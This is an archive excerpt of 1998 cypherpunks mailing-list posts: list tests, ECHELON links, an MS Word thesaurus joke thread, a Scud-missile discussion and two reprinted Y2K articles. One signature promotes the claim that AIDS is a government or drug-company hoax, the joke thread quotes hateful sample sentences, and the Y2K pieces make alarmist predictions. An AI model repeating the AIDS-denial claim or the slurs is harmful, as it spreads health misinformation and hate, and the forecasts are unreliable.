CQUxDxcNOTgwOTI2MTEwNjI1WjAjBgkqhkiG9w0BCQQxFgQUzeu/BAQjDSKs
q66UIOvc4MVoSQwwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggq
hkiG9w0DAgICAIAwBwYFKw4DAgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcN
AwICASgwDQYJKoZIhvcNAQEBBQAEgYCRs4O0rQR3dPm3XxwLRoK9QjEQej9b
QpFkrprOpH6L2eElo0Tg0K2U5JrrE0lCdsC11VM2opiO/wppFId54+24JC8x
TRTDZpQfs1/4uTCozWDf+6QCd0ikqpBi5PhCPS2VHovtbyniHQ8HJ0dIXBEM
ufNis5nvdXd71JSlJLsEOA==
--Boundary..3996.1071713803.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 26 Sep 1998 02:53:35 +0800
To: cypherpunks@minder.net
Subject: Test - Ignore
Message-ID: <199809260756.JAA03532@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



ping




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 26 Sep 1998 10:04:44 +0800
To: cypherpunks@toad.com
Subject: EuroParl Hits ECHELON
Message-ID: <199809261455.KAA17434@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Campbell has provided the September 14
European Parliament multi-lingual discussion on ECHELON 
and the related minutes:

   http://jya.com/ep091498-1.htm  (minutes in English; 11K)

   http://jya.com/ep091498-2.htm  (discussion in several languages, not
English; 82K)

English translations of the latter are welcomed by Duncan and JYA.
EP official translations may be some time acoming.

Duncan Campbell <duncan@gn.apc.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 26 Sep 1998 10:51:29 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Test [No Reply]
Message-ID: <199809261553.KAA00228@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Test [No Reply]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kamikaze23@juno.com (Fallen I Angel)
Date: Sat, 26 Sep 1998 10:32:03 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199809252131.XAA24463@replay.com>
Message-ID: <19980926.111946.12502.1.kamikaze23@juno.com>
MIME-Version: 1.0
Content-Type: text/plain




oh yeah,

try somethin like 
-- I'm an alcoholic
-- I'd like all minorities to die

it seems that anything w/ an apostrophe will get the phrase "I'd drink to
that"

it was on the UPN 9 News at 10 p.m. Just a simple mistake.  microsoft
released a patch, i think.

On Fri, 25 Sep 1998 23:31:14 +0200 Anonymous <nobody@replay.com> writes:
>How about:
>
>I'd like humping your mom with a prosthetic limb.
>I'd like Hillary to get down on both knees and eat out Monica's ass.
>I'd like nothing more than for anyone who even thinks about mentioning
>Bill Clinton to spontaneously combust, preferably right in front of a 
>gas
>pump where his whole family is sitting in some sort of catatonic 
>stupor,
>unable to digest any information beyond that which The Machine feeds
>them every day.

>Who the fuck wouldn't drink to that?  For Christ's sake, I'd be 
>buying!
>
>
>At 10:34 PM 9/25/98 +0200, Anonymous wrote:
>>On Thu, 24 Sep 1998 21:43:34 -0400 "Edwin E. Smith" 
><edsmith@IntNet.net>
>>writes:
>>>
>>>
>>>
>>>If you have Microsoft Word (6.0 or later), and have a thesaurus
>>>installed, do the following:
>>>
>>>1) Open a new, blank document.
>>>2) Type in the words: I'd like to see Bill Clinton resign.
>>>3) Highlight the entire sentence.
>>>4) Click on the tools menu and select thesaurus (tools, language,
>>>   thesaurus)
>>>
>>>Look what is immediately highlighted in the selection box. 
>>>
>>
>>This was almost funny. Too bad the following sentences also work:
>>I'd like to drink frog urine
>>I'd like to hug large, purple dinosaurs
>>I'd like to cook onions with garlic and tomatoes
>>I'd like to strangle you with a mouse cable


___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Sat, 26 Sep 1998 11:14:27 +0800
To: Jim Burnes <jvb@ssds.com>
Subject: Re: arms collectors...
In-Reply-To: <19980925195613.A3801@die.com>
Message-ID: <3.0.2.32.19980926113818.007e45a0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 07:46 PM 9/25/98 -0600, you wrote:
>On Fri, 25 Sep 1998, David Emery wrote:
>
>> ----- Forwarded message from "Thomas B. Roach" 
<sigint@thegrid.net> -----
>> 
>> 
>> Washington Times, 25 Sep 98
>> Operable missile seized in customs
>> By Bill Gertz THE WASHINGTON TIMES
>> 
>> U.S.  and British authorities are investigating how a Russian-
design
>> Scud missile was imported illegally by a weapons collector in
>> California, The Washington Times has learned.
>> 
>> "This is a full-blown missile," said John Hensley, a senior agent 
of the
>> U.S.  Customs Service in Los Angeles.  "The only thing missing is 
the
>> warhead."
>> 
>> A Scud B missile and its mobile transporter-erector launcher --
minus the
>> warhead -- were seized Sept.  2 by customs agents in Port Hueneme,
>> Calif., about 35 miles north of Los Angeles, said officials 
familiar
>> with the case.
>> 
>
>Scuze me for picking nits, but if the missile doesn't have a
>warhead then its just a rocket (plus some guidance systems).
>
>When does a rocket become a "weapon of mass destruction"?
>
>Maybe what American officials should be investigating is how US 
defense
>contractors got an export license to sell ICBM components to the 
ChiCom's. 
>I heard it was OK'd by the pres himself -- theorectically for big
>campaign donations.
>
>If those missiles are targeted at US, then that would constitute
>blatant treason, would it not?
>
>Inquiring minds want to know.
>
>jim
>
>
>
>

I wouldn't be afraid to bet that some Republicans were in on this and 
worse. I am not a fan of either Dems or Reps but I wonder if the 
reason the sex angle is being persued first is to get Clinton and the 
Dems out without any mud splashback.

I have heard that Starr is far from finished so time will tell.

In the end though I doubt if much will change for the beltway 
bandits.

Edwin
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNg0KaUmNf6b56PAtEQLwcACeNZQNCyEWpDagJdXuY/OJdBE0xcIAoJBy
yRaxR2UpW7Of5LryelWZdqRz
=odq+
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm

When you blame others, you give up your power to change.
Dr. Robert Anthony

Libertarian Party of Hillsborough County, FL
   http://home.tampabay.rr.com/lphc

When a place gets crowded enough to require ID's, social collapse is not far
away. It is time to go elsewhere. The best thing about space travel is that
it made it possible to go elsewhere.

Lazarus Long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 26 Sep 1998 15:20:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Funny Money: New $20 FRNs are here
In-Reply-To: <v02140b01b2308b890230@[208.25.61.131]>
Message-ID: <3.0.5.32.19980926125123.0084e2b0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




At 03:20 PM 9/25/98 -0700, pnet@proliberty.com wrote:

>It has been reported that these 'security threads' enable detection
>equipment at airports to measure, or estimate, the amount of cash a person
>is carrying. 

1. Diamonds fluoresce under x rays.  Don't know about alumina.
2. Anyone tried to get an RF reflection off the chaff-strips in the bills?








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.hdc.net>
Date: Sat, 26 Sep 1998 15:14:32 +0800
To: cypherpunks@cyberpass.net
Subject: The Year 2000 Problem: The Good News and the Bad
Message-ID: <360D5DD0.1F2D@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



>From THE FUTURIST (May 1998) 

                              The Year 2000 Problem:
                              The Good News and the Bad

                              The Year 2000 computer glitch has proved surprisingly 
troublesome.
                              Opportunities as well as dangers lie ahead.


             By Cynthia G. Wagner

             Four years ago, an author named Peter de Jager submitted to THE
             FUTURIST a reprint of an article he had published in a computer magazine.
             Entitled "Doomsday," the article warned of what will happen to the 
world's
             computers when 2000 rolls around.

             We editors rejected the article because it had already been published in
             another magazine and because it had already found its proper
             audience_computer programmers. We also felt that the "Year 2000
             Problem" was a minor technical glitch that would probably be fixed long
             before the year 2000.

             We were wrong: The Year 2000 Problem (or Y2K) was more serious than
             we thought. Very soon, what seemed like a minor technical problem to
             us_and to most other people at the time_had set off a furor and even
             created a new industry for consultants and programmers.

             Peter de Jager went on to co-write (with Richard Bergeon) a very useful
             book called Managing 00: Surviving the Year 2000 Computing Crisis [see
             box on page 19]. And as the year 2000 approaches, this book has been
             joined by multitudes of books, articles, reports, and Web sites 
addressing
             the problem.

             For our part, the editors of THE FUTURIST are doing penance by
             presenting this overview of the problem and its possible consequences. We
             also will summarize some ideas on how to prepare to cope with it.

             The Problem and What It Will Cost to Fix

             In the early days of computer programming, dates were entered as a
             six-digit configuration: two digits for the month, two digits for the 
day, and
             two digits for the year, or MMDDYY.

             Now, every date-relevant program in every computer needs to be Y2K
             compliant_that is, able to recognize eight-digit dates with four-digit 
years as
             opposed to two. Otherwise, the computer will not understand that life 
goes
             forward after the year "99" rather than magically skipping back in time 
to
             "00."

             Experts say that it's not exactly clear what problems non-compliant
             computers will create over the next few years. They may make lots of
             mistakes, such as paroling prisoners years early or sending Gen X'ers
             pension checks many decades too soon. Humans may catch many of the
             computers' mistakes, but most humans are too busy. That's why we have
             computers keeping track of things and telling us what to do, like taking
             expired foods and medicines off the shelf.

             Most sources say it is costing businesses between 50 and $2 a line to 
fix the
             codes. It may not sound like much, but all told, it will add up to many
             billions of dollars. Chase Manhattan Bank estimates that it will spend 
$200
             million to $250 million to fix its Y2K problems, and commercial banking 
as
             an industry may spend $9 billion or more, according to the Wall Street
             Journal. The U.S. government will need to spend about $30 billion, says 
the
             Gartner Group, a market-research firm in Stamford, Connecticut.

             Some organizations will decide to replace the millennium-unready systems
             altogether, perhaps spending more at the outset but avoiding costly 
problems
             later. The University of Chicago Hospital System, for example, figured it
             would cost $1.5 million to fix the Y2K problem on a patient-accounting
             system that needed to be replaced anyhow, so it decided to buy a new
             software system for $3 million to $7 million.

             Bottom line: We're looking at a repair/replacement bill of up to $600 
billion
             worldwide by the end of 1999, according to the Gartner Group. That's more
             than the gross national product of Canada.

             Interconnectivity: Passing the Bug

             The Year 2000 Problem affects not only computers (mainframes, minis,
             and micros), but the myriad of microchips embedded in many of our
             products, including airplanes, cars, microwave ovens, etc., points out 
Y2K
             authority John Whitehouse, president of ChangeWise, Inc., in 
Jacksonville,
             Florida. Furthermore, as he notes in his recent audiobook The Year 2000 
Is
             Coming: What Do I Do?, the year 2000 is a leap year, a circumstance that
             also will have at least some consequences: Banks, for example, would fail 
to
             calculate one day's worth of interest (February 29), which is significant
             when you are dealing with billions of dollars.

             Y2K problems are sometimes deeply embedded in "legacy" programs,
             which are the products of the old programming days. Some such programs
             will begin automatically deleting data that is more than two years old, 
warns
             Whitehouse. The work you do on programs such as Excel may be at risk
             unless you get upgraded software.

             Even if you don't think you have a big problem with your own computers,
             or if you solve your own Y2K problems, you will still have to deal with
             countless other individuals, businesses, agencies, and governments who 
may
             not have solved the problem in their systems. Computers, businesses, and
             governments are highly interconnected today: A problem anywhere has the
             potential for global consequences, and there may be many, many problems
             emerging as 2000 arrives.

             Still, there is a potential bright side:

             "For those who come to understand and accept the issues, for those who
             take decisive action, this can be the opportunity of a lifetime," says
             Whitehouse. "As we approach the most catastrophic event the modern
             world has yet faced, proactive companies can gain a significant strategic
             advantage while others fail. And knowledgeable investors can post
             monumental gains while others lose."

             Getting Rich from the Glitch

             A disaster almost always presents profitable opportunities. The hundreds 
of
             billions of dollars spent on fixing the Y2K Problem will wind up in
             somebody's pocket. One pocket could be yours. Expected Y2K winners
             include:

                  Programmers and consultants. Anyone with the technical skills to
                  solve the problem is now in high demand. Y2K guru Peter de Jager
                  identifies a wide variety of consultants ready to provide services,
                  including planning consultants for tools assessment, testing 
consultants,
                  contract service consultants to estimate the costs and plan and
                  implement the code redesign, legal consultants, and recovery
                  consultants. 
                  Information providers, including publishers and Web site
                  developers. The Wall Street Journal, for example, recently sold 
eight
                  pages of advertising in a special section devoted to companies 
offering
                  "Year 2000 Solutions" (February 19, 1998). A variety of consultants
                  and subscription-based Y2K assistance can be found on de Jager's
                  Year 2000 Web site (www.year2000.com). 
                  Investors. Wherever new businesses bloom, investors are sure to see
                  prospects for fast growth. Unfortunately, it's already late in the 
game
                  to invest in Y2K companies: You'd be "buying high," and it's always
                  risky to chase headlines for ideas on short-term speculation. As 
Wall
                  Street Journal writer John R. Dorfman warns about these so-called
                  story stocks, "That's an investment method that has often led 
investors
                  to grief in the past." 
                  Lawyers and litigators. Individuals and businesses stand to lose a 
lot
                  of money and time because of the Y2K Problem; therefore, they will
                  want to sue anybody they consider responsible for creating the
                  problem. If, for example, your life insurance policy is canceled
                  because a computer thinks you're too old, you'll probably want to 
sue
                  someone. 

             Worst-Case Scenarios: Chaos and Crashes

             Pundits have warned of potential disasters IF the Year 2000 Problem is 
not
             fixed in time. It's not clear how seriously to take them, but these 
possibilities
             have been mentioned:

             Food shortages may occur because stores will discard all products that 
have
             passed their freshness expiration dates.

             Some patients may die because medicines and lifesaving devices are
             unavailable. Drugs, like foods, have expiration dates and may be 
discarded
             upon the command of non-Y2K-compliant computers. Medical devices
             such as heart defibrillators are programmed to cease functioning if the 
date
             for maintenance checks has passed.

             Borrowers could default on loans and mortgages as computers add on a
             century's worth of interest rates. Consumers may find they can't make
             purchases because credit-card verification systems misinterpret 
expiration
             dates. Similarly, there may be a cash crisis as automatic teller machines
             freeze up.

             Stock markets could crash because investors fearing Y2K fiscal chaos may
             take their money out of the markets_perhaps in November or December
             1999_as Y2K impends. On the other hand, the crash might create a golden
             opportunity for investors ready to jump into the market when others run 
for
             the hills.

             Crime waves may occur as a general financial crisis creates economic
             hardship and jailed criminals are mistakenly released. One prison has
             already reportedly released criminals prematurely because parole dates 
were
             misinterpreted by computers.

             Other problems and inconveniences could include elevators getting stuck
             and airplanes being grounded, as the dates for maintenance checks appear 
to
             be missed and computers shut the systems down entirely. Date-sensitive
             computer-controlled security systems may fail, causing factories to shut 
and
             bank vaults to lock up. Drivers' licenses could seem to have expired, 
making
             it hard for people to rent cars. Voter registration records may be 
disrupted,
             creating havoc for the 2000 U.S. presidential and congressional 
elections.

             What Should We Do?

             To get started in solving your Y2K problems, John Whitehouse of
             ChangeWise recommends building a "systems inventory." Analyze your
             computer dependency_what do you use to get through the day, what
             outside systems do you depend on? What alternative sources of goods and
             services are there?

             Similar procedures need to be done at home and at work; specifically,
             Whitehouse suggests:

             Individuals and family heads should check out personal items that contain
             computer chips. Examples include heating and air conditioning systems,
             home-security systems, telephone-answering machines, TVs, VCRs, cell
             phones, cars. And of course, your home PC: The operating system itself
             may not work.

             Now test the devices. Enter 2000 in your VCR, or change the system date
             on your PC (after backing up the data). Send letters to manufacturers to 
see
             if their systems are Y2K compliant. Record on inventories where you still
             have risks, and develop a course of action, such as identifying 
alternative
             providers.

             You should also check software such as Access 95, Excel, personal
             schedulers, financial programs like Quicken or Money, communications
             software, etc. And remember that you could experience problems with
             outside services you use: the phone company, utilities, supermarkets, 
banks,
             gas stations, airports.

             "Forget flying to see Grandma on January 1, 2000," warns Whitehouse.
             "Two major airlines have already said they won't be flying." And the
             Federal Aviation Administration has admitted it will be late in meeting 
Y2K
             compliance.

             If you are an investor, your money is in places you can't control, so you
             should inventory all your assets (equity, debt, and fixed tangible). 
Check
             with the companies to find out their Y2K status and record the results.
             Perhaps less than half of U.S. companies have begun addressing the
             problem, and movement is lagging even farther in other countries,
             particularly Third World companies.

             One worry is that there may be runs on banks when people fear the Y2K
             impacts. Whitehouse goes so far as to suggest that investors begin 
hedging
             with fixed tangible assets: "Buy some gold and silver." Businesses should 
set
             up an organizational task force to address the issue, including managers
             from each area of the enterprise. "Problem ownership" should lie with the
             chief financial officer because of the many financial and legal 
implications.
             The task force should consider questions like cost, impacts on daily
             activities, competitors' actions, opportunities, effects on stock prices, 
etc.

             The CFO might ask how the company will be affected, where the money
             will come from to fix it, how cash flow will be impacted, and how
             customers will be impacted. Sales managers might ask what new products
             can be offered. Human-resources directors might ask whether new skills 
will
             be needed and whether the firm's best people will leave. The U.S.
             government, for example, is already concerned about a "brain drain" of
             technology experts leaving the Internal Revenue Service and the Pentagon.
             Each division must then do a systems inventory, find alternatives to 
systems
             and programs that are not compliant, test those alternatives, and affirm 
that
             all trading partners are compliant. "This will enable you to succeed 
where
             your competitors will fail," reassures Whitehouse. De Jager and Bergeon,
             authors of Managing 00, emphasize the need to test applications for their
             ability to handle the year 2000, but recognize that time is running short 
and
             that workloads for the reprogrammers are already overwhelming. They
             recommend giving priority to the applications that are most required for
             your survival, followed by those that give you a competitive edge.

             "Only you can determine whether you will allow yourself to be 'forced' 
not
             to test," write de Jager and Bergeon. "Forgoing testing is never 
acceptable,
             but in the real world, it happens."

             Learning from Y2K

             The lesson of the Year 2000 Problem is obvious: Most of the problems we
             face in the present are the result of someone (or everyone) in the past 
failing
             to think about the future. Y2K is a problem basically because mainframe
             computer programmers paid little attention to the long-term future. While
             saving money by using two-digit codes to enter years instead of four
             (computer memory was expensive in those days), either they never thought
             their programs would still be in use by the year 2000 or they never 
realized
             that computers, unlike fuzzy-thinking humans, would literally interpret 
years
             as having only two digits.

             We can smugly congratulate ourselves for being smarter than our
             technologies, but meanwhile, technology is biting us back.


             About the Author

             Cynthia G. Wagner is managing editor of THE FUTURIST.

             (c) 1998 World Future Society 

<http://www.wfs.org/y2kwag.htm>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nnburk <nnburk@cobain.HDC.NET>
Date: Sat, 26 Sep 1998 15:15:02 +0800
To: cypherpunks@cyberpass.net
Subject: The Year 2000: Social Chaos or Social Transformation?
Message-ID: <360D63AA.744B@yankton.com>
MIME-Version: 1.0
Content-Type: text/plain



The Year 2000: Social Chaos or Social
                                 Transformation? 

                    by John L. Petersen, Margaret Wheatley, Myron 
Kellner-Rogers 

                    version in PDF (Adobe Acrobat)       Download Acrobat 
      

Editor's Note:  This is a draft of an article scheduled for publication 
in the October 1998 issue of THE FUTURIST.  Due to the
time-sensitive nature of the material, it was posted here to create 
greater awareness of the issue as well as elicit comments and questions
before final publication. Please send your comments and questions to the 
authors at johnp@arlinst.org and the editors at
cwagner@wfs.org .

     The Millenial sun will first rise over human civilization in the 
independent republic of Kiribati, a group of some thirty low
     lying coral islands in the Pacific Ocean that straddle the equator 
and the International Date Line, halfway between Hawaii and
     Australia. This long awaited sunrise marks the dawn of the year 
2000, and quite possibly, the onset of unheralded disruptions
     in life as we know it in many parts of the globe. Kiribati's 81,000 
Micronesians may observe nothing different about this
     dawn; they only received TV in 1989. However, for those who live in 
a world that relies on satellites, air, rail and ground
     transportation, manufacturing plants, electricity, heat, telephones, 
or TV, when the calendar clicks from '99 to '00, we will
     experience a true millennial shift. As the sun moves westward on 
January 1, 2000, as the date shifts silently within millions
     of computerized systems, we will begin to experience our 
computer-dependent world in an entirely new way. We will finally
     see the extent of the networked and interdependent processes we have 
created. At the stroke of midnight, the new millenium
     heralds the greatest challenge to modern society we have yet to face 
as a planetary community. Whether we experience this as
     chaos or social transformation will be influenced by what we do 
immediately. 

     We are describing the year 2000 problem, known as Y2K (K signifying 
1000.) Nicknamed at first "The Millennial Bug,"
     increasing sensitivity to the magnitude of the impending crisis has 
escalated it to "The Millennial Bomb." The problem
     begins as a simple technical error. Large mainframe computers more 
than ten years old were not programmed to handle a
     four digit year. Sitting here now, on the threshold of the year 
2000, it seems incomprehensible that computer programmers
     and microchip designers didn't plan for it. But when these billions 
of lines of computer code were being written, computer
     memory was very expensive. Remember when a computer only had 16 
kilobytes of RAM? To save storage space, most
     programmers allocated only two digits to a year. 1993 is '93' in 
data files, 1917 is '17.' These two-digit dates exist on millions
     of files used as input to millions of applications. (The era in 
which this code was written was described by one programming
     veteran as "the Wild West." Programmers did whatever was required to 
get a product up and working; no one even thought
     about standards.) 

     The same thing happened in the production of microchips as recently 
as three years ago. Microprocessors and other
     integrated circuits are often just sophisticated calculators that 
count and do math. They count many things: fractions of
     seconds, days, inches, pounds, degrees, lumens, etc. Many chips that 
had a time function designed into them were only
     structured for this century. And when the date goes from '99 to '00 
both they and the legacy software that has not been fixed
     will think it is still the 20th century -- not 2000, but 1900. 

     Peter de Jager, who has been actively studying the problem and its 
implications since 1991, explains the computer math
     calculation: "I was born in 1955. If I ask the computer to calculate 
how old I am today, it subtracts 55 from 98 and announces
     that I'm 43. . . But what happens in the year 2000? The computer 
will subtract 55 from 00 and will state that I am minus 55
     years old. This error will affect any calculation that produces or 
uses time spans. . . If you want to sort by date (e.g., 1965,
     1905, 1966), the resulting sequence would be 1905, 1965, 1966. 
However, if you add in a date record such as 2015, the
     computer, which reads only the last two digits of the date, sees 05, 
15, 65, 66 and sorts them incorrectly. These are just two
     types of calculations that are going to produce garbage."1

     The calculation problem explains why the computer system at Marks & 
Spencer department store in London recently
     destroyed tons of food during the process of doing a long term 
forecast. The computer read 2002 as 1902. Instead of four more
     years of shelf life, the computer calculated that this food was 
ninety-six years old. It ordered it thrown out.2

     A similar problem happened recently in the U.S. at the warehouse of 
a freeze dried food manufacturer. But Y2K is not about
     wasting good food. Date calculations affect millions more systems 
than those that deal with inventories, interest rates, or
     insurance policies. Every major aspect of our modern infrastructure 
has systems and equipment that rely on such
     calculations to perform their functions. We are dependent on 
computerized systems that contain date functions to effectively
     manage defense, transportation, power generation, manufacturing, 
telecommunications, finance, government, education,
     healthcare. The list is longer, but the picture is clear. We have 
created a world whose efficient functioning in all but the
     poorest and remotest areas is dependent on computers. It doesn't 
matter whether you personally use a computer, or that most
     people around the world don't even have telephones. The world's 
economic and political infrastructures rely on computers.
     And not isolated computers. We have created dense networks of 
reliance around the globe. We are networked together for
     economic and political purposes. Whatever happens in one part of the 
network has an impact on other parts of the network.
     We have created not only a computer-dependent society, but an 
interdependent planet. 

     We already have frequent experiences with how fragile these systems 
are, and how failure cascades through a networked
     system. While each of these systems relies on millions of lines of 
code that detail the required processing, they handle their
     routines in serial fashion. Any next step depends on the preceding 
step. This serial nature makes systems, no matter their
     size, vulnerable to even the slightest problem anywhere in the 
system. In 1990, ATT's long distance system experienced
     repeated failures. At that time, it took two million lines of 
computer code to keep the system operational. But these millions of
     lines of code were brought down by just three lines of faulty code.

     And these systems are lean; redundancies are eliminated in the name 
of efficiency. This leanness also makes the system
     highly vulnerable. In May of this year, 90% of all pagers in the 
U.S. crashed for a day or longer because of the failure of one
     satellite. Late in 1997, the Internet could not deliver email to the 
appropriate addresses because bad information from their
     one and only central source corrupted their servers. 

     Compounding the fragility of these systems is the fact that we can't 
see the extent of our interconnectedness. The networks
     that make modern life possible are masked by the technology. We only 
see the interdependencies when the relationships are
     disrupted -- when a problem develops elsewhere and we notice that we 
too are having problems. When Asian markets failed
     last year, most U.S. businesses denied it would have much of an 
impact on our economy. Only recently have we felt the extent
     to which Asian economic woes affect us directly. Failure in one part 
of a system always exposes the levels of
     interconnectedness that otherwise go unnoticed-we suddenly see how 
our fates are linked together. We see how much we
     are participating with one another, sustaining one another. 

     Modern business is completely reliant on networks. Companies have 
vendors, suppliers, customers, outsourcers (all, of
     course, managed by computerized data bases.) For Y2K, these highly 
networked ways of doing business create a terrifying
     scenario. The networks mean that no one system can protect itself 
from Y2K failures by just attending to its own internal
     systems. General Motors, which has been working with extraordinary 
focus and diligence to bring their manufacturing plants
     up to Year 2000 compliance, (based on their assessment that they 
were facing catastrophe,) has 100,000 suppliers worldwide.
     Bringing their internal systems into compliance seems nearly 
impossible, but what then do they do with all those vendors who
     supply parts? GM experiences production stoppages whenever one key 
supplier goes on strike. What is the potential number
     of delays and shutdowns possible among 100,000 suppliers? 

     The nature of systems and our history with them paints a chilling 
picture of the Year 2000. We do not know the extent of the
     failures, or how we will be affected by them. But we do know with 
great certainty that as computers around the globe respond
     or fail when their calendars record 2000, we will see clearly the 
extent of our interdependence. We will see the ways in which
     we have woven the modern world together through our technology. 

What, me worry? 

     Until quite recently, it's been difficult to interest most people in 
the Year 2000 problem. Those who are publicizing the
     problem (the Worldwide Web is the source of the most extensive 
information on Y2K,) exclaim about the general lack of
     awareness, or even the deliberate blindness that greets them. In our 
own investigation among many varieties of organizations
     and citizens, we've noted two general categories of response. In the 
first category, people acknowledge the problem but view it
     as restricted to a small number of businesses, or a limited number 
of consequences. People believe that Y2K affects only a few
     industries-primarily finance and insurance-seemingly because they 
deal with dates on policies and accounts. Others note
     that their organization is affected by Y2K, but still view it as a 
well-circumscribed issue that is being addressed by their
     information technology department. What's common to these comments 
is that people hold Y2K as a narrowly-focused,
     bounded problem. They seem oblivious to the networks in which they 
participate, or to the systems and interconnections of
     modern life. 

     The second category of reactions reveals the great collective faith 
in technology and science. People describe Y2K as a
     technical problem, and then enthusiastically state that human 
ingenuity and genius always finds a way to solve these type of
     problems. Ecologist David Orr has noted that one of the fundamental 
beliefs of our time is that technology can be trusted to
     solve any problem it creates.3 If a software engineer goes on TV 
claiming to have created a program that can correct all
     systems, he is believed. After all, he's just what we've been 
expecting. 

     And then there is the uniqueness of the Year 2000 problem. At no 
other time in history have we been forced to deal with a
     deadline that is absolutely non-negotiable. In the past, we could 
always hope for a last minute deal, or rely on round-the-clock
     bargaining, or pray for an eleventh hour savior. We have never had 
to stare into the future knowing the precise date when the
     crisis would materialize. In a bizarre fashion, the inevitability of 
this confrontation seems to add to people's denial of it. They
     know the date when the extent of the problem will surface, and 
choose not to worry about it until then. 

     However, this denial is quickly dissipating. Information on Y2K is 
expanding exponentially, matched by an escalation in
     adjectives used to describe it. More public figures are speaking 
out. This is critically important. With each calendar tick of
     this time, alternatives diminish and potential problems grow. We 
must develop strategies for preparing ourselves at all levels
     to deal with whatever Y2K presents to us with the millennium dawn. 

     What we know about Y2K 

          a technological problem that cannot be solved by technology 
          the first-ever, non-negotiable deadline 
          a systemic crisis that no one can solve alone 
          a crisis that transcends boundaries and hierarchies 
          an opportunity to evoke greater capacity from individuals and 
organizations 
          an opportunity to simplify and redesign major systems 


                          Figure 1 

The Y2K problem, really 

     We'd like to describe in greater detail the extent of Y2K. As a 
global network of interrelated consequences, it begins at the
     center with the technical problem, legacy computer codes and 
embedded microchips. (see Figure One) For the last thirty
     years thousands of programmers have been writing billions of lines 
of software code for the computers on which the world's
     economy and society now depend. Y2K reporter Ed Meagher describes 
"old, undocumented code written in over 2500 different
     computer languages and executed on thousands of different hardware 
platforms being controlled by hundreds of different
     operating systems . . . [that generate] further complexity in the 
form of billions of six character date fields stored in millions
     of databases that are used in calculations."4 The Gartner Group, a 
computer-industry research group, estimates that
     globally, 180 billion lines of software code will have to be 
screened.5 Peter de Jager notes that it is not unusual for a company
     to have more than 100,000,000 lines of code--the IRS, for instance, 
has at least eighty million lines. The Social Security
     Administration began working on its thirty million lines of code in 
1991. After five years of work, in June, 1996, four
     hundred programmers had fixed only six million lines. The IRS has 
88,000 programs on 80 mainframe computers to debug.
     By the end of last year they had cleaned up 2,000 programs.6 Capers 
Jones, head of Software Productivity Research, a firm
     that tracks programmer productivity, estimates that finding, fixing 
and testing all Y2K-affected software would require over
     700,000 person-years.7 Programmers have been brought out of 
retirement and are receiving extraordinary wages and
     benefits to stick with this problem, but we are out of time. There 
aren't nearly enough programmers nor hours remaining
     before January 1, 2000. 

     Also at the center of this technical time bomb are the embedded 
microprocessors. There are somewhat over a billion of these
     hardware chips located in systems worldwide. They sustain the 
world's manufacturing and engineering base. They exist in
     traffic lights, elevators, water, gas, and electricity control 
systems. They're in medical equipment and military and navigation
     systems. America's air traffic control system is dependent upon 
them. They're located in the track beds of railroad systems
     and in the satellites that circle the earth. Global 
telecommunications are heavily dependent on them. Modern cars contain
     about two dozen microprocessors. The average American comes in 
contact with seventy microprocessors before noon every
     day. Many of these chips aren't date sensitive, but a great number 
are, and engineers looking at long ago installed systems
     don't know for sure which is which. To complicate things further, 
not all chips behave the same. Recent tests have shown that
     two chips of the same model installed in two different computers but 
performing the same function are not equally sensitive to
     the year-end problem. One shuts down and the other doesn't. 

     It is impossible to locate all of these chips in the remaining 
months, nor can we replace all those that are identified. Those
     more than three years old are obsolete and are probably not 
available in the marketplace. The solution in those cases is to
     redesign and remanufacture that part of the system -- which often 
makes starting over with new equipment the best option.
     That is why some companies are junking their computer systems and 
spending millions, even hundreds of millions, to replace
     everything. It at least ensures that their internal systems work. 

     At issue is time, people, money, and the nature of systems. These 
technical problems are exacerbated by government and
     business leaders who haven't yet fully understood the potential 
significance of this issue for their own companies, to say
     nothing of the greater economic implications. The U.S. leads all 
other developed nations in addressing this issue, minimally
     by six to nine months. Yet in a recent survey of American corporate 
chief information officers, 70% of them expressed the
     belief that even their companies would not be completely prepared 
for Y2K. Additionally, 50% of them acknowledged that they
     would not fly during January 2000. If America is the global leader 
in Y2K efforts, these CIO comments are indeed sobering. 

